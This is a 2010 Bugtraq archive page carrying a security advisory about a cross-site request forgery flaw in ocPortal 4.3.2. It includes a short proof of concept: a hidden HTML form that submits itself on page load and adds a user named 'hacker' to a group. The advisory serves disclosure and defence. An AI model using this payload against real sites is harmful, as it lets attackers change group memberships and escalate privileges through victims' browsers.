[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSRF (CSRF) in ocPortal

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSRF (CSRF) in ocPortal
From: advisory@xxxxxxxxxxx
Date: Thu, 20 May 2010 20:16:31 +0200 (CEST)

Vulnerability ID: HTB22369
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_ocportal.html
Product: ocPortal
Vendor: ocProducts Ltd
Vulnerable Version: 4.3.2 and Probably Prior Versions
Vendor Notification: 05 May 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/site/index.php" script to 
properly verify the source of HTTP request. 

Successful exploitation of this vulnerability could result in a compromise of 
the application, theft of cookie-based authentication credentials, disclosure 
or modification of sensitive data. 

Attacker can use browser to exploit this vulnerability. The following PoC is 
available: 


<form action="http://host/site/index.php?page=groups&type=add_to&id=2";  
method="post"  >
<input type="hidden" name="username" value="hacker" >
</form>
<script>
document.forms[0].submit()
</script>

Prev by Date: Vulnerability in widget Flash Tag Cloud for Blogsa and other ASP.NET engines
Next by Date: [ MDVSA-2010:104 ] dovecot
Previous by thread: Vulnerability in widget Flash Tag Cloud for Blogsa and other ASP.NET engines
Next by thread: [ MDVSA-2010:104 ] dovecot
Index(es):
- Date
- Thread